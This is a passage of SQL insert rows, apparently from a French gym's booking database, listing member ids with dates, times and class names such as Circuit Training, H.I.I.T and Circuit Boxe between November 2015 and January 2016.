(5087, 138, 'CTR', '2015-11-16', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5088, 138, 'CTR', '2015-11-16', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5089, 169, 'CTR', '2015-11-17', '18h15', '18h45', 'Circuit Training'),
(5090, 169, 'CTR', '2015-11-20', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5091, 169, 'CTR', '2015-11-20', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5092, 14, 'CTR', '2015-11-16', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5093, 14, 'CTR', '2015-11-16', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5094, 14, 'CTR', '2015-11-18', '19h ', '19h30', 'Circuit training'),
(5095, 44, 'CTR', '2015-11-17', '18h15', '18h45', 'Circuit Training'),
(5128, 165, 'CTR', '2015-11-25', '19h ', '19h30', 'Circuit training'),
(5125, 49, 'CTR', '2015-11-19', '12h45', '13h15', 'Circuit training'),
(5098, 187, 'CTR', '2015-11-19', '18h15', '18h45', 'Circuit Training'),
(5099, 106, 'CTR', '2015-11-16', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5100, 106, 'CTR', '2015-11-16', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5133, 28, 'CTR', '2015-11-19', '12h45', '13h15', 'Circuit training'),
(5102, 132, 'CTR', '2015-11-18', '19h ', '19h30', 'Circuit training'),
(5103, 32, 'CTR', '2015-11-16', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5104, 32, 'CTR', '2015-11-16', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5105, 32, 'CTR', '2015-11-16', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5106, 32, 'CTR', '2015-11-16', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5107, 56, 'CTR', '2015-11-16', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5108, 56, 'CTR', '2015-11-16', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5109, 202, 'CTR', '2015-11-16', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5110, 103, 'CTR', '2015-11-16', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5111, 103, 'CTR', '2015-11-16', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5112, 35, 'CTR', '2015-11-19', '12h45', '13h15', 'Circuit training'),
(5129, 171, 'CTR', '2015-11-25', '19h ', '19h30', 'Circuit training'),
(5114, 101, 'CTR', '2015-11-17', '18h15', '18h45', 'Circuit Training'),
(5115, 93, 'CTR', '2015-11-17', '18h15', '18h45', 'Circuit Training'),
(5116, 195, 'CTR', '2015-11-18', '18h15', '18h45', 'Réservé sportifs'),
(5117, 195, 'CTR', '2015-11-18', '18h15', '18h45', 'Réservé sportifs'),
(5118, 173, 'CTR', '2015-11-18', '20h30', '21h', 'Circuit Training'),
(5119, 196, 'CTR', '2015-11-18', '20h30', '21h', 'Circuit Training'),
(5127, 164, 'CTR', '2015-11-25', '19h ', '19h30', 'Circuit training'),
(5136, 175, 'CTR', '2015-11-18', '17h30', '18h', 'Circuit training'),
(5122, 3, 'CTR', '2015-11-18', '20h30', '21h', 'Circuit Training'),
(5123, 49, 'CTR', '2015-11-18', '17h30', '18h', 'Circuit training'),
(5124, 93, 'CTR', '2015-11-17', '18h15', '18h45', 'Circuit Training'),
(5126, 80, 'CTR', '2015-11-19', '12h45', '13h15', 'Circuit training'),
(5130, 173, 'CTR', '2015-11-25', '20h30', '21h', 'Circuit Training'),
(5131, 196, 'CTR', '2015-11-25', '20h30', '21h', 'Circuit Training'),
(5132, 180, 'CTR', '2015-11-25', '20h30', '21h', 'Circuit Training'),
(5134, 28, 'CTR', '2015-11-20', '17h30', '18h', 'TRX'),
(5135, 28, 'CTR', '2015-11-19', '12h45', '13h15', 'Circuit training'),
(5137, 147, 'CTR', '2015-11-18', '17h30', '18h', 'Circuit training'),
(5138, 56, 'CTR', '2015-11-18', '20h30', '21h', 'Circuit Training'),
(5139, 56, 'CTR', '2015-11-20', '17h30', '18h', 'TRX'),
(5140, 194, 'CTR', '2015-11-18', '17h30', '18h', 'Circuit training'),
(5141, 105, 'CTR', '2015-11-19', '18h15', '18h45', 'Circuit Training'),
(5142, 199, 'CTR', '2015-11-19', '12h45', '13h15', 'Circuit training'),
(5143, 199, 'CTR', '2015-11-20', '17h30', '18h', 'TRX'),
(5144, 106, 'CTR', '2015-11-19', '12h45', '13h15', 'Circuit training'),
(5145, 140, 'CTR', '2015-11-19', '12h45', '13h15', 'Circuit training'),
(5150, 48, 'CTR', '2015-11-20', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5147, 192, 'CTR', '2015-11-20', '17h30', '18h', 'TRX'),
(5148, 192, 'CTR', '2015-11-20', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5149, 192, 'CTR', '2015-11-20', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5151, 48, 'CTR', '2015-11-20', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5152, 31, 'CTR', '2015-11-20', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5153, 31, 'CTR', '2015-11-20', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5154, 31, 'CTR', '2015-11-24', '18h15', '18h45', 'Circuit Training'),
(5155, 188, 'CTR', '2015-11-25', '20h30', '21h', 'Circuit Training'),
(5227, 56, 'CTR', '2015-11-27', '17h30', '18h', 'Circuit training '),
(5218, 191, 'CTR', '2015-11-26', '18h15', '18h45', 'Circuit Training'),
(5205, 200, 'CTR', '2015-11-25', '19h ', '19h30', 'Circuit training'),
(5174, 35, 'CTR', '2015-11-26', '12h45', '13h15', 'Circuit training'),
(5160, 49, 'CTR', '2015-11-25', '17h30', '18h', 'Circuit training'),
(5161, 204, 'CTR', '2015-11-25', '20h30', '21h', 'Circuit Training'),
(5162, 44, 'CTR', '2015-11-23', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5163, 44, 'CTR', '2015-11-23', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5164, 92, 'CTR', '2015-11-23', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5165, 92, 'CTR', '2015-11-23', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5208, 140, 'CTR', '2015-11-25', '17h30', '18h', 'Circuit training'),
(5167, 48, 'CTR', '2015-11-23', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5168, 48, 'CTR', '2015-11-23', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5169, 193, 'CTR', '2015-11-23', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5170, 193, 'CTR', '2015-11-23', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5171, 138, 'CTR', '2015-11-24', '18h15', '18h45', 'Circuit Training'),
(5172, 132, 'CTR', '2015-11-25', '20h30', '21h', 'Circuit Training'),
(5175, 147, 'CTR', '2015-11-25', '20h30', '21h', 'Circuit Training'),
(5176, 175, 'CTR', '2015-11-25', '20h30', '21h', 'Circuit Training'),
(5177, 14, 'CTR', '2015-11-23', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5178, 14, 'CTR', '2015-11-23', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5179, 14, 'CTR', '2015-11-25', '19h ', '19h30', 'Circuit training'),
(5180, 199, 'CTR', '2015-11-26', '12h45', '13h15', 'Circuit training'),
(5181, 28, 'CTR', '2015-11-26', '12h45', '13h15', 'Circuit training'),
(5182, 28, 'CTR', '2015-11-26', '12h45', '13h15', 'Circuit training'),
(5183, 106, 'CTR', '2015-11-26', '12h45', '13h15', 'Circuit training'),
(5184, 106, 'CTR', '2015-11-23', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5223, 192, 'CTR', '2015-11-27', '18h', '18h30', 'Circuit training'),
(5186, 106, 'CTR', '2015-11-23', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5187, 205, 'CTR', '2015-11-26', '12h45', '13h15', 'Circuit training'),
(5188, 32, 'CTR', '2015-11-23', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5189, 32, 'CTR', '2015-11-23', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5224, 31, 'CTR', '2015-11-27', '18h', '18h30', 'Circuit training'),
(5191, 169, 'CTR', '2015-11-24', '18h15', '18h45', 'Circuit Training'),
(5192, 31, 'CTR', '2015-11-26', '12h45', '13h15', 'Circuit training'),
(5193, 192, 'CTR', '2015-11-24', '18h15', '18h45', 'Circuit Training'),
(5194, 187, 'CTR', '2015-11-25', '17h30', '18h', 'Circuit training'),
(5195, 100, 'CTR', '2015-11-25', '17h30', '18h', 'Circuit training'),
(5196, 93, 'CTR', '2015-11-24', '18h15', '18h45', 'Circuit Training'),
(5222, 192, 'CTR', '2015-11-27', '17h30', '18h', 'Circuit training '),
(5220, 29, 'CTR', '2015-11-26', '18h15', '18h45', 'Circuit Training'),
(5200, 48, 'CTR', '2015-11-24', '18h15', '18h45', 'Circuit Training'),
(5201, 44, 'CTR', '2015-11-24', '18h15', '18h45', 'Circuit Training'),
(5202, 93, 'CTR', '2015-11-24', '18h15', '18h45', 'Circuit Training'),
(5203, 49, 'CTR', '2015-11-26', '12h15', '12h45', 'Circuit training'),
(5226, 14, 'CTR', '2015-12-02', '19h ', '19h30', 'Circuit training'),
(5221, 105, 'CTR', '2015-11-26', '18h15', '18h45', 'Circuit Training'),
(5260, 44, 'CTR', '2015-12-03', '18h15', '18h45', 'Circuit Training'),
(5261, 181, 'CTR', '2015-12-02', '19h ', '19h30', 'Circuit training'),
(5219, 187, 'CTR', '2015-11-26', '18h15', '18h45', 'Circuit Training'),
(5273, 80, 'CTR', '2015-12-02', '19h ', '19h30', 'Circuit training'),
(5213, 44, 'CTR', '2015-11-26', '18h15', '18h45', 'Circuit Training'),
(5214, 101, 'CTR', '2015-11-26', '18h15', '18h45', 'Circuit Training'),
(5215, 138, 'CTR', '2015-11-26', '18h15', '18h45', 'Circuit Training'),
(5216, 193, 'CTR', '2015-11-26', '18h15', '18h45', 'Circuit Training'),
(5228, 80, 'CTR', '2015-11-27', '17h30', '18h', 'Circuit training '),
(5229, 80, 'CTR', '2015-11-27', '18h', '18h30', 'Circuit training'),
(5230, 28, 'CTR', '2015-12-03', '12h45', '13h15', 'Circuit training'),
(5276, 147, 'CTR', '2015-12-02', '18h15', '18h45', 'Circuit Training'),
(5275, 205, 'CTR', '2015-12-03', '12h45', '13h15', 'Circuit training'),
(5233, 164, 'CTR', '2015-12-02', '19h ', '19h30', 'Circuit training'),
(5234, 165, 'CTR', '2015-12-02', '19h ', '19h30', 'Circuit training'),
(5235, 171, 'CTR', '2015-12-02', '19h ', '19h30', 'Circuit training'),
(5236, 132, 'CTR', '2015-12-02', '20h30', '21h', 'Circuit Training'),
(5237, 196, 'CTR', '2015-12-02', '20h30', '21h', 'Circuit Training'),
(5238, 188, 'CTR', '2015-12-02', '20h30', '21h', 'Circuit Training'),
(5239, 80, 'CTR', '2015-12-02', '20h30', '21h', 'Circuit Training'),
(5240, 180, 'CTR', '2015-12-02', '20h30', '21h', 'Circuit Training'),
(5241, 60, 'CTR', '2015-12-02', '20h30', '21h', 'Circuit Training'),
(5242, 173, 'CTR', '2015-12-02', '20h30', '21h', 'Circuit Training'),
(5243, 195, 'CTR', '2015-12-02', '19h ', '19h30', 'Circuit training'),
(5244, 200, 'CTR', '2015-12-02', '19h ', '19h30', 'Circuit training'),
(5245, 31, 'CTR', '2015-12-03', '12h45', '13h15', 'Circuit training'),
(5264, 92, 'CTR', '2015-12-02', '18h15', '18h45', 'Circuit Training'),
(5266, 48, 'CTR', '2015-12-02', '17h30', '18h', 'Circuit training'),
(5268, 31, 'CTR', '2015-12-02', '18h15', '18h45', 'Circuit Training'),
(5267, 31, 'CTR', '2015-12-02', '17h30', '18h', 'Circuit training'),
(5263, 48, 'CTR', '2015-12-02', '18h15', '18h45', 'Circuit Training'),
(5265, 138, 'CTR', '2015-12-02', '18h15', '18h45', 'Circuit Training'),
(5282, 138, 'CTR', '2015-12-09', '18h15', '18h45', 'Circuit Training'),
(5281, 138, 'CTR', '2015-12-07', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5330, 193, 'CTR', '2015-12-07', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5280, 138, 'CTR', '2015-12-07', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5272, 140, 'CTR', '2015-12-03', '12h45', '13h15', 'Circuit training'),
(5302, 28, 'CTR', '2015-12-03', '12h45', '13h15', 'Circuit training'),
(5277, 175, 'CTR', '2015-12-02', '18h15', '18h45', 'Circuit Training'),
(5278, 56, 'CTR', '2015-12-02', '20h30', '21h', 'Circuit Training'),
(5314, 105, 'CTR', '2015-12-03', '18h15', '18h45', 'Circuit Training'),
(5285, 106, 'CTR', '2015-12-07', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5286, 106, 'CTR', '2015-12-07', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5287, 187, 'CTR', '2015-12-03', '18h15', '18h45', 'Circuit Training'),
(5288, 164, 'CTR', '2015-12-09', '19h ', '19h30', 'Circuit training'),
(5290, 165, 'CTR', '2015-12-09', '19h ', '19h30', 'Circuit training'),
(5291, 195, 'CTR', '2015-12-09', '19h ', '19h30', 'Circuit training'),
(5292, 195, 'CTR', '2015-12-09', '19h ', '19h30', 'Circuit training'),
(5293, 80, 'CTR', '2015-12-09', '19h ', '19h30', 'Circuit training'),
(5294, 14, 'CTR', '2015-12-09', '19h ', '19h30', 'Circuit training'),
(5295, 132, 'CTR', '2015-12-09', '20h30', '21h', 'Circuit Training'),
(5296, 173, 'CTR', '2015-12-09', '20h30', '21h', 'Circuit Training'),
(5298, 196, 'CTR', '2015-12-09', '20h30', '21h', 'Circuit Training'),
(5299, 188, 'CTR', '2015-12-09', '20h30', '21h', 'Circuit Training'),
(5345, 31, 'CTR', '2015-12-09', '17h30', '18h', 'Circuit training'),
(5346, 31, 'CTR', '2015-12-09', '18h15', '18h45', 'Circuit Training'),
(5308, 35, 'CTR', '2015-12-03', '12h45', '13h15', 'Circuit training'),
(5315, 30, 'CTR', '2015-12-07', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5305, 92, 'CTR', '2015-12-07', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5306, 92, 'CTR', '2015-12-07', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5307, 191, 'CTR', '2015-12-03', '18h15', '18h45', 'Circuit Training'),
(5385, 210, 'CTR', '2015-12-17', '12h45', '13h15', 'Circuit training'),
(5384, 48, 'CTR', '2015-12-16', '18h15', '18h45', 'Circuit Training'),
(5383, 48, 'CTR', '2015-12-16', '17h30', '18h', 'Circuit training'),
(5316, 30, 'CTR', '2015-12-07', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5317, 48, 'CTR', '2015-12-07', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5318, 48, 'CTR', '2015-12-07', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5319, 192, 'CTR', '2015-12-07', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5320, 192, 'CTR', '2015-12-07', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5321, 210, 'CTR', '2015-12-10', '18h15', '18h45', 'Circuit Training'),
(5322, 44, 'CTR', '2015-12-07', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5323, 44, 'CTR', '2015-12-07', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5324, 31, 'CTR', '2015-12-07', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5325, 31, 'CTR', '2015-12-07', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5329, 32, 'CTR', '2015-12-07', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5328, 32, 'CTR', '2015-12-07', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5331, 193, 'CTR', '2015-12-07', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5332, 56, 'CTR', '2015-12-07', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5333, 56, 'CTR', '2015-12-07', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5334, 191, 'CTR', '2015-12-10', '18h15', '18h45', 'Circuit Training'),
(5335, 191, 'CTR', '2015-12-14', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5336, 191, 'CTR', '2015-12-14', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5337, 132, 'CTR', '2015-12-10', '18h15', '18h45', 'Circuit Training'),
(5338, 175, 'CTR', '2015-12-09', '17h30', '18h', 'Circuit training'),
(5339, 147, 'CTR', '2015-12-09', '17h30', '18h', 'Circuit training'),
(5340, 48, 'CTR', '2015-12-09', '17h30', '18h', 'Circuit training'),
(5341, 48, 'CTR', '2015-12-09', '18h15', '18h45', 'Circuit Training'),
(5342, 192, 'CTR', '2015-12-09', '18h15', '18h45', 'Circuit Training'),
(5343, 179, 'CTR', '2015-12-09', '18h15', '18h45', 'Circuit Training'),
(5344, 181, 'CTR', '2015-12-09', '18h15', '18h45', 'Circuit Training'),
(5347, 31, 'CTR', '2015-12-14', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5348, 31, 'CTR', '2015-12-14', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5349, 200, 'CTR', '2015-12-09', '19h ', '19h30', 'Circuit training'),
(5350, 180, 'CTR', '2015-12-09', '20h30', '21h', 'Circuit Training'),
(5358, 48, 'CTR', '2015-12-14', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5352, 103, 'CTR', '2015-12-09', '18h15', '18h45', 'Circuit Training'),
(5355, 44, 'CTR', '2015-12-10', '18h15', '18h45', 'Circuit Training'),
(5354, 92, 'CTR', '2015-12-09', '18h15', '18h45', 'Circuit Training'),
(5356, 44, 'CTR', '2015-12-14', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5357, 44, 'CTR', '2015-12-14', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5359, 48, 'CTR', '2015-12-14', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5360, 195, 'CTR', '2015-12-14', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5361, 195, 'CTR', '2015-12-14', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5362, 195, 'CTR', '2015-12-14', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5363, 195, 'CTR', '2015-12-14', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5364, 195, 'CTR', '2015-12-16', '18h15', '18h45', 'Circuit Training'),
(5365, 195, 'CTR', '2015-12-16', '18h15', '18h45', 'Circuit Training'),
(5366, 138, 'CTR', '2015-12-16', '18h15', '18h45', 'Circuit Training'),
(5367, 92, 'CTR', '2015-12-16', '18h15', '18h45', 'Circuit Training'),
(5427, 92, 'CTR', '2015-12-23', '18h15', '18h45', 'Circuit Training'),
(5403, 60, 'CTR', '2015-12-16', '20h30', '21h', 'Circuit Training'),
(5405, 44, 'CTR', '2015-12-16', '18h15', '18h45', 'Circuit Training'),
(5406, 103, 'CTR', '2015-12-16', '18h15', '18h45', 'Circuit Training'),
(5372, 14, 'CTR', '2015-12-16', '19h ', '19h30', 'Circuit training'),
(5374, 188, 'CTR', '2015-12-16', '20h30', '21h', 'Circuit Training'),
(5375, 132, 'CTR', '2015-12-16', '20h30', '21h', 'Circuit Training'),
(5377, 173, 'CTR', '2015-12-16', '17h30', '18h', 'Circuit training'),
(5378, 80, 'CTR', '2015-12-16', '20h30', '21h', 'Circuit Training'),
(5379, 60, 'CTR', '2015-12-16', '20h30', '21h', 'Circuit Training'),
(5380, 105, 'CTR', '2015-12-10', '18h15', '18h45', 'Circuit Training'),
(5382, 192, 'CTR', '2015-12-10', '18h15', '18h45', 'Circuit Training'),
(5393, 30, 'CTR', '2015-12-14', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5402, 49, 'CTR', '2015-12-16', '17h30', '18h', 'Circuit training'),
(5388, 31, 'CTR', '2015-12-16', '17h30', '18h', 'Circuit training'),
(5389, 31, 'CTR', '2015-12-16', '18h15', '18h45', 'Circuit Training'),
(5390, 138, 'CTR', '2015-12-14', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5391, 138, 'CTR', '2015-12-14', '19h45', '20h15', 'Circuit Boxe Partie2'),
(5394, 30, 'CTR', '2015-12-14', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5401, 31, 'CTR', '2015-12-17', '12h45', '13h15', 'Circuit training'),
(5396, 14, 'CTR', '2015-12-14', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5397, 14, 'CTR', '2015-12-14', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5398, 32, 'CTR', '2015-12-14', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5399, 32, 'CTR', '2015-12-14', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5404, 188, 'CTR', '2015-12-16', '20h30', '21h', 'Circuit Training'),
(5407, 175, 'CTR', '2015-12-16', '20h30', '21h', 'Circuit Training'),
(5408, 147, 'CTR', '2015-12-16', '20h30', '21h', 'Circuit Training'),
(5410, 80, 'CTR', '2015-12-17', '18h15', '18h45', 'Circuit Training'),
(5411, 28, 'CTR', '2015-12-17', '12h45', '13h15', 'Circuit training'),
(5412, 28, 'CTR', '2015-12-17', '12h45', '13h15', 'Circuit training'),
(5413, 49, 'CTR', '2015-12-17', '12h45', '13h15', 'Circuit training'),
(5419, 60, 'CTR', '2015-12-23', '20h30', '21h', 'Circuit Training'),
(5415, 44, 'CTR', '2015-12-17', '18h15', '18h45', 'Circuit Training'),
(5416, 140, 'CTR', '2015-12-17', '12h15', '12h45', 'Circuit training'),
(5417, 199, 'CTR', '2015-12-17', '12h45', '13h15', 'Circuit training'),
(5418, 80, 'CTR', '2015-12-17', '18h15', '18h45', 'Circuit Training'),
(5420, 196, 'CTR', '2015-12-23', '20h30', '21h', 'Circuit Training'),
(5421, 132, 'CTR', '2015-12-23', '20h30', '21h', 'Circuit Training'),
(5422, 80, 'CTR', '2015-12-23', '20h30', '21h', 'Circuit Training'),
(5423, 188, 'CTR', '2015-12-23', '20h30', '21h', 'Circuit Training'),
(5424, 175, 'CTR', '2015-12-23', '17h30', '18h', 'Circuit training'),
(5425, 180, 'CTR', '2015-12-23', '20h30', '21h', 'Circuit Training'),
(5426, 173, 'CTR', '2015-12-23', '20h30', '21h', 'Circuit Training'),
(5428, 44, 'CTR', '2015-12-23', '18h15', '18h45', 'Circuit Training'),
(5429, 138, 'CTR', '2015-12-23', '18h15', '18h45', 'Circuit Training'),
(5430, 48, 'CTR', '2015-12-23', '18h15', '18h45', 'Circuit Training'),
(5431, 48, 'CTR', '2015-12-23', '17h30', '18h', 'Circuit training'),
(5432, 195, 'CTR', '2015-12-23', '18h15', '18h45', 'Circuit Training'),
(5433, 14, 'CTR', '2015-12-23', '19h ', '19h30', 'Circuit training'),
(5434, 60, 'CTR', '2015-12-23', '20h30', '21h', 'Circuit Training'),
(5435, 44, 'CTR', '2015-12-21', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5436, 44, 'CTR', '2015-12-21', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5437, 48, 'CTR', '2015-12-21', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5438, 48, 'CTR', '2015-12-21', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5439, 210, 'CTR', '2015-12-23', '19h ', '19h30', 'Circuit training'),
(5458, 204, 'CTR', '2015-12-23', '20h30', '21h', 'Circuit Training'),
(5441, 138, 'CTR', '2015-12-21', '19h15', '19h45', 'Circuit Boxe Partie 1'),
(5442, 101, 'CTR', '2015-12-21', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5443, 101, 'CTR', '2015-12-21', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5457, 211, 'CTR', '2015-12-23', '17h30', '18h', 'Circuit training'),
(5456, 210, 'CTR', '2015-12-30', '17h30', '18h', 'Circuit training'),
(5446, 180, 'CTR', '2015-12-30', '20h30', '21h', 'Circuit Training'),
(5447, 173, 'CTR', '2015-12-30', '20h30', '21h', 'Circuit Training'),
(5495, 41, 'CTR', '2016-01-06', '19h ', '19h30', 'Circuit training'),
(5449, 132, 'CTR', '2015-12-30', '20h30', '21h', 'Circuit Training'),
(5450, 188, 'CTR', '2015-12-30', '20h30', '21h', 'Circuit Training'),
(5451, 60, 'CTR', '2015-12-30', '20h30', '21h', 'Circuit Training'),
(5452, 31, 'CTR', '2015-12-21', '18h15', '18h45', 'H.I.I.T (High Intensity Interval Training) partie 1'),
(5453, 31, 'CTR', '2015-12-21', '18h45', '19h15', 'H.I.I.T (High Intensity Interval Training) partie 2'),
(5454, 179, 'CTR', '2015-12-30', '17h30', '18h', 'Circuit training'),
(5455, 181, 'CTR', '2015-12-30', '17h30', '18h', 'Circuit training'),
(5477, 210, 'CTR', '2016-01-06', '18h15', '18h45', 'Circuit Training'),
(5460, 60, 'CTR', '2015-12-30', '20h30', '21h', 'Circuit Training'),
(5461, 204, 'CTR', '2015-12-30', '20h30', '21h', 'Circuit Training'),
(5462, 14, 'CTR', '2015-12-23', '18h15', '18h45', 'Circuit Training'),
(5463, 80, 'CTR', '2015-12-23', '19h ', '19h30', 'Circuit training'),
(5464, 80, 'CTR', '2015-12-23', '19h ', '19h30', 'Circuit training'),
(5465, 101, 'CTR', '2015-12-23', '18h15', '18h45', 'Circuit Training'),
(5466, 48, 'CTR', '2015-12-30', '17h30', '18h', 'Circuit training'),
(5467, 44, 'CTR', '2015-12-30', '17h30', '18h', 'Circuit training'),
(5469, 138, 'CTR', '2015-12-30', '17h30', '18h', 'Circuit training'),
(5470, 188, 'CTR', '2015-12-30', '20h30', '21h', 'Circuit Training'),
(5471, 31, 'CTR', '2015-12-30', '17h30', '18h', 'Circuit training'),
(5478, 180, 'CTR', '2016-01-06', '20h30', '21h', 'Circuit Training'),
(5487, 210, 'CTR', '2016-01-09', '11h05', '11h35', 'Circuit Niveau 2'),
(5531, 210, 'CTR', '2016-01-09', '11h40', '12h10', 'Circuit Niveau 3'),
(5480, 204, 'CTR', '2016-01-06', '20h30', '21h', 'Circuit Training'),
(5481, 173, 'CTR', '2016-01-06', '20h30', '21h', 'Circuit Training'),
(5482, 60, 'CTR', '2016-01-06', '20h30', '21h', 'Circuit Training'),
(5483, 188, 'CTR', '2016-01-06', '20h30', '21h', 'Circuit Training'),
(5496, 165, 'CTR', '2016-01-06', '19h ', '19h30', 'Circuit training'),
(5485, 188, 'CTR', '2016-01-06', '20h30', '21h', 'Circuit Training'),
(5491, 44, 'CTR', '2016-01-06', '18h15', '18h45', 'Circuit Training'),
(5490, 138, 'CTR', '2016-01-06', '18h15', '18h45', 'Circuit Training'),
(5528, 195, 'CTR', '2016-01-06', '17h30', '18h', 'TRX Suspension Training'),
(5497, 164, 'CTR', '2016-01-06', '19h ', '19h30', 'Circuit training'),
(5494, 193, 'CTR', '2016-01-06', '18h15', '18h45', 'Circuit Training'),
(5500, 132, 'CTR', '2016-01-09', '11h05', '11h35', 'Circuit Niveau 2'),
(5501, 212, 'CTR', '2016-01-06', '20h30', '21h', 'Circuit Training'),
(5502, 49, 'CTR', '2016-01-07', '12h45', '13h15', 'Circuit training'),
(5503, 132, 'CTR', '2016-01-09', '11h40', '12h10', 'Circuit Niveau 3'),
(5504, 192, 'CTR', '2016-01-09', '11h05', '11h35', 'Circuit Niveau 2'),
(5505, 192, 'CTR', '2016-01-09', '11h40', '12h10', 'Circuit Niveau 3'),
(5568, 213, 'CTR', '2016-01-10', '10h15', '10h45', 'Duo Training'),
(5508, 35, 'CTR', '2016-01-07', '12h45', '13h15', 'Circuit training'),
(5509, 28, 'CTR', '2016-01-07', '12h45', '13h15', 'Circuit training'),
(5510, 205, 'CTR', '2016-01-07', '12h45', '13h15', 'Circuit training'),
(5511, 182, 'CTR', '2016-01-06', '19h ', '19h30', 'Circuit training'),
(5512, 184, 'CTR', '2016-01-06', '19h ', '19h30', 'Circuit training'),
(5516, 183, 'CTR', '2016-01-06', '19h ', '19h30', 'Circuit training'),
(5514, 179, 'CTR', '2016-01-06', '19h ', '19h30', 'Circuit training'),
(5515, 181, 'CTR', '2016-01-06', '19h ', '19h30', 'Circuit training'),
(5517, 80, 'CTR', '2016-01-06', '20h30', '21h', 'Circuit Training'),
(5518, 191, 'CTR', '2016-01-07', '18h15', '18h45', 'Circuit Training'),
(5519, 48, 'CTR', '2016-01-06', '18h15', '18h45', 'Circuit Training'),
